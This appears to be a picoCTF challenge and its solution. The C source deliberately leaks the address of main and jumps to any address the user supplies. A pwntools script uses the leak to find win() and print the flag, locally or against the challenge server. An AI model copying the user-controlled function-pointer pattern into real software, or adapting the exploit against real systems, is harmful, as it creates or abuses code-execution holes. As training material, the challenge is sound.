Source
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
printf("Address of main: %p\n", &main);
unsigned long val;
printf("Enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
printf("Your input: %lx\n", val);
void (*foo)(void) = (void (*)())val;
foo();
}
Solution
#!/usr/bin/env python3
from pwn import *
elf = ELF("./vuln_patched")
context.binary = elf
context.terminal = ["alacritty", "-e", "sh", "-c"]
dbginit = """
b main
"""
def conn():
if args.REMOTE:
r = remote("rescued-float.picoctf.net", 54073)
elif args.GDB:
r = gdb.debug([elf.path], gdbscript=dbginit)
else:
r = process([elf.path])
return r
def main():
r = conn()
r.recvuntil(b'Address of main: ')
# turn string into int
addr_main = int(r.recvuntilS(b'\n', drop=True), 16)
# calculate the base address
elf.address = addr_main - elf.sym["main"]
# turn address of win into hexadecimal literal
payload = hex(elf.sym["win"])
# send the payload
r.sendlineafter(b'Enter the address to jump to, ex => 0x12345: ', payload)
# throw away the garbage
r.recvuntil(b'You won!\n')
# get the flag
flag = r.recvuntil(b'\n', drop=True).decode("ascii")
print()
print(flag)
print()
if __name__ == "__main__":
main()